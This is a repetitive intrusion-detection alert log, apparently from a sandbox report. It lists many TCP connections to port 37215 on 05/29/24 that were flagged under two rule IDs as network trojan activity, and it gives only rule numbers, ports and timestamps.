                SID:2835222
                Source Port:32846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.019353
                SID:2829579
                Source Port:34514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228211
                SID:2829579
                Source Port:55122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461268
                SID:2829579
                Source Port:34960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896470
                SID:2835222
                Source Port:32936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.172690
                SID:2835222
                Source Port:56368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.467401
                SID:2835222
                Source Port:40928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500451
                SID:2835222
                Source Port:50736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.576044
                SID:2835222
                Source Port:37086
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.845799
                SID:2829579
                Source Port:57950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715138
                SID:2835222
                Source Port:32918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667715
                SID:2835222
                Source Port:38786
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226735
                SID:2835222
                Source Port:59406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.931900
                SID:2835222
                Source Port:33648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945723
                SID:2835222
                Source Port:60262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466058
                SID:2829579
                Source Port:38700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.743467
                SID:2835222
                Source Port:44422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899473
                SID:2835222
                Source Port:48200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502933
                SID:2829579
                Source Port:53428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684774
                SID:2829579
                Source Port:56630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610009
                SID:2829579
                Source Port:47410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.905923
                SID:2835222
                Source Port:43126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.951482
                SID:2835222
                Source Port:43596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584208
                SID:2829579
                Source Port:57928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444495
                SID:2835222
                Source Port:54910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.028838
                SID:2835222
                Source Port:47698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783023
                SID:2829579
                Source Port:43982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321173
                SID:2835222
                Source Port:49460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330522
                SID:2835222
                Source Port:53060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.073597
                SID:2835222
                Source Port:47304
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864380
                SID:2835222
                Source Port:37102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227798
                SID:2829579
                Source Port:50590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.876138
                SID:2829579
                Source Port:47258
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.325042
                SID:2829579
                Source Port:52812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784691
                SID:2835222
                Source Port:60758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767469
                SID:2829579
                Source Port:43780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508689
                SID:2835222
                Source Port:35652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854211
                SID:2835222
                Source Port:42756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.386532
                SID:2835222
                Source Port:47048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660430
                SID:2835222
                Source Port:55518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321422
                SID:2835222
                Source Port:35504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815840
                SID:2835222
                Source Port:34796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557693
                SID:2835222
                Source Port:49244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572323
                SID:2835222
                Source Port:49784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859585
                SID:2835222
                Source Port:47956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321925
                SID:2829579
                Source Port:45344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859442
                SID:2829579
                Source Port:56942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.841692
                SID:2835222
                Source Port:54946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.385731
                SID:2835222
                Source Port:49116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281652
                SID:2835222
                Source Port:60284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617725
                SID:2829579
                Source Port:51642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653078
                SID:2829579
                Source Port:50368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867541
                SID:2835222
                Source Port:51016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.022498
                SID:2835222
                Source Port:59982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.727874
                SID:2835222
                Source Port:50390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521678
                SID:2829579
                Source Port:56284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948195
                SID:2829579
                Source Port:59244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.708704
                SID:2835222
                Source Port:46042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667521
                SID:2829579
                Source Port:37810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.895867
                SID:2829579
                Source Port:53110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.726546
                SID:2829579
                Source Port:47556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663237
                SID:2835222
                Source Port:42848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868229
                SID:2829579
                Source Port:45748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166433
                SID:2829579
                Source Port:43824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286707
                SID:2829579
                Source Port:50252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266505
                SID:2829579
                Source Port:46750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781096
                SID:2829579
                Source Port:50586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948885
                SID:2835222
                Source Port:36072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463245
                SID:2835222
                Source Port:55002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466178
                SID:2829579
                Source Port:48694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814898
                SID:2829579
                Source Port:56232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617249
                SID:2829579
                Source Port:57810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870035
                SID:2829579
                Source Port:43330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437063
                SID:2835222
                Source Port:51808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.109136
                SID:2835222
                Source Port:33446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560056
                SID:2835222
                Source Port:39502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903007
                SID:2829579
                Source Port:48386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610091
                SID:2829579
                Source Port:43686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321225
                SID:2835222
                Source Port:44256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.669396
                SID:2835222
                Source Port:47020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165770
                SID:2829579
                Source Port:59548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.835735
                SID:2829579
                Source Port:59892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.444760
                SID:2835222
                Source Port:57402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221542
                SID:2829579
                Source Port:49924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522716
                SID:2829579
                Source Port:34872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572416
                SID:2835222
                Source Port:49738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626376
                SID:2835222
                Source Port:51150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.686900
                SID:2829579
                Source Port:39956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.971541
                SID:2829579
                Source Port:52564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663628
                SID:2829579
                Source Port:57766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853193
                SID:2835222
                Source Port:54192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843446
                SID:2835222
                Source Port:43882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763398
                SID:2835222
                Source Port:45604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897122
                SID:2835222
                Source Port:47830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791002
                SID:2829579
                Source Port:57884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381251
                SID:2835222
                Source Port:36934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583184
                SID:2829579
                Source Port:50710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.802671
                SID:2829579
                Source Port:49684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.934974
                SID:2835222
                Source Port:45110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873189
                SID:2835222
                Source Port:35884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074741
                SID:2835222
                Source Port:34902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501327
                SID:2829579
                Source Port:59052
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267015
                SID:2829579
                Source Port:43282
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.898232
                SID:2829579
                Source Port:47280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610191
                SID:2829579
                Source Port:60444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839070
                SID:2829579
                Source Port:44026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.190004
                SID:2829579
                Source Port:42988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535843
                SID:2835222
                Source Port:58392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900425
                SID:2835222
                Source Port:36108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189788
                SID:2829579
                Source Port:40780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613217
                SID:2829579
                Source Port:60926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988583
                SID:2835222
                Source Port:49406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009864
                SID:2829579
                Source Port:55852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968444
                SID:2829579
                Source Port:53494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573303
                SID:2829579
                Source Port:38286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721747
                SID:2835222
                Source Port:51180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826302
                SID:2835222
                Source Port:33642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559078
                SID:2829579
                Source Port:35850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665865
                SID:2829579
                Source Port:46350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509864
                SID:2829579
                Source Port:58624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.668598
                SID:2829579
                Source Port:58062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931697
                SID:2829579
                Source Port:52986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.317819
                SID:2835222
                Source Port:37002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418302
                SID:2835222
                Source Port:42060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284332
                SID:2829579
                Source Port:39326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.812049
                SID:2835222
                Source Port:38852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779377
                SID:2829579
                Source Port:39326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.361632
                SID:2835222
                Source Port:34002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831246
                SID:2835222
                Source Port:50972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499125
                SID:2835222
                Source Port:47972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262101
                SID:2829579
                Source Port:37238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583312
                SID:2829579
                Source Port:49532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135538
                SID:2829579
                Source Port:60400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381223
                SID:2835222
                Source Port:58924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171170
                SID:2835222
                Source Port:60204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.652891
                SID:2829579
                Source Port:41684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858892
                SID:2829579
                Source Port:45920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418377
                SID:2835222
                Source Port:35766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667372
                SID:2835222
                Source Port:57066
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.940193
                SID:2835222
                Source Port:56612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669484
                SID:2829579
                Source Port:56578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900234
                SID:2835222
                Source Port:39750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.461958
                SID:2835222
                Source Port:57536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559745
                SID:2835222
                Source Port:52198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.712677
                SID:2829579
                Source Port:47204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.780688
                SID:2835222
                Source Port:48234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897012
                SID:2835222
                Source Port:55404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.833446
                SID:2829579
                Source Port:44140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873290
                SID:2829579
                Source Port:36262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764450
                SID:2835222
                Source Port:41806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332347
                SID:2829579
                Source Port:54828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716248
                SID:2835222
                Source Port:45004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.211915
                SID:2835222
                Source Port:58866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420259
                SID:2835222
                Source Port:59188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.930984
                SID:2829579
                Source Port:38342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782197
                SID:2835222
                Source Port:46506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002009
                SID:2835222
                Source Port:43232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573355
                SID:2829579
                Source Port:35560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653543
                SID:2829579
                Source Port:41616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.373969
                SID:2829579
                Source Port:57404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617654
                SID:2835222
                Source Port:48178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209695
                SID:2829579
                Source Port:50180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711324
                SID:2829579
                Source Port:33302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997326
                SID:2835222
                Source Port:43098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.809278
                SID:2829579
                Source Port:51468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076615
                SID:2829579
                Source Port:43916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.702651
                SID:2829579
                Source Port:36504
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420913
                SID:2835222
                Source Port:45468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813484
                SID:2829579
                Source Port:37554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.044310
                SID:2829579
                Source Port:36892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521240
                SID:2835222
                Source Port:47248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791587
                SID:2835222
                Source Port:54060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.222907
                SID:2835222
                Source Port:34288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.711393
                SID:2835222
                Source Port:50728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612880
                SID:2829579
                Source Port:57400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869334
                SID:2835222
                Source Port:32814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781309
                SID:2829579
                Source Port:36024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559362
                SID:2835222
                Source Port:60432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728696
                SID:2829579
                Source Port:60608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284497
                SID:2835222
                Source Port:44724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655595
                SID:2835222
                Source Port:41320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.870084
                SID:2829579
                Source Port:35008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.650128
                SID:2835222
                Source Port:56082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.905485
                SID:2829579
                Source Port:50668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899155
                SID:2835222
                Source Port:43228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826337
                SID:2829579
                Source Port:39350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499511
                SID:2835222
                Source Port:40470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336480
                SID:2829579
                Source Port:35616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415767
                SID:2835222
                Source Port:60110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136047
                SID:2829579
                Source Port:51570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177288
                SID:2835222
                Source Port:44020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263968
                SID:2835222
                Source Port:48966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626694
                SID:2829579
                Source Port:50948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.825998
                SID:2829579
                Source Port:56098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664184
                SID:2835222
                Source Port:35744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557186
                SID:2835222
                Source Port:42958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364477
                SID:2829579
                Source Port:43088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.236695
                SID:2829579
                Source Port:39990
                Destination Port:37215
